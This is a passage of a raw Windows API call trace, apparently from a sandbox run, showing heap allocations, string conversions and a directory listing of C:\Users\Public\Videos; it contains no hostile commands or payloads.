lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9) returned 0x2aab620 [0224.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2aab620, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0224.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5fb40 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab440 [0224.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Videos", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0224.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17) returned 0x29f6ee0 [0224.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Videos", cchWideChar=23, lpMultiByteStr=0x29f6ee0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Public\\Videos", lpUsedDefaultChar=0x0) returned 23 [0224.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0224.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0224.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0224.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2a734f8 [0224.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0224.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0224.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0224.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0224.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0224.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0224.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0224.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0224.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0224.270] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77c60, cbMultiByte=23, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0224.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2a73568 [0224.270] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77c60, cbMultiByte=23, lpWideCharStr=0x2a73568, cchWideChar=23 | out: lpWideCharStr="C:\\Users\\Public\\Videos") returned 23 [0224.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0224.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73680 [0224.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73568 | out: hHeap=0x2af0000) returned 1 [0224.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0224.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0224.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73680 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0224.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fb40 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0224.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0224.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0224.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0224.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74980 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a734f8 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0224.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0224.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0224.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0224.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0224.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0224.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0224.272] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0224.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0224.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0224.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0224.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0224.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0224.272] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\" (normalized: "c:\\users\\public\\videos")) returned 0x11 [0224.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0224.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0224.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0224.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0224.272] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0224.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0224.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0224.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0224.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0224.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17) returned 0x29f6f00 [0224.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x29f6f00, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0224.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0224.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x59) returned 0x2a75000 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab158 [0224.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0224.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0224.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2a71a48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75000 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0224.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0224.274] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0224.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0224.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0224.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0224.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0224.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0224.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0224.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0224.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0224.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0224.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0224.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0224.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0224.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0224.275] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0224.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0224.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0224.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0224.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0224.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0224.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0224.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0224.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0224.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0224.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0224.276] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0x9e2078 [0224.276] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0224.276] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0224.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70e0 [0224.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0224.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0224.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0224.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0224.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0224.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0224.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0224.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0224.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0224.276] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0224.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0224.276] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0224.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0224.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0224.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0224.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0224.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0224.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0224.277] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0224.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0224.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0224.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0224.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0224.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0224.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0224.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0224.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0224.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0224.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0224.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0224.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0224.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0224.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0224.278] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.278] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0224.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0224.278] RtlAllocateHeap (HeapHandle=0x2af0000, 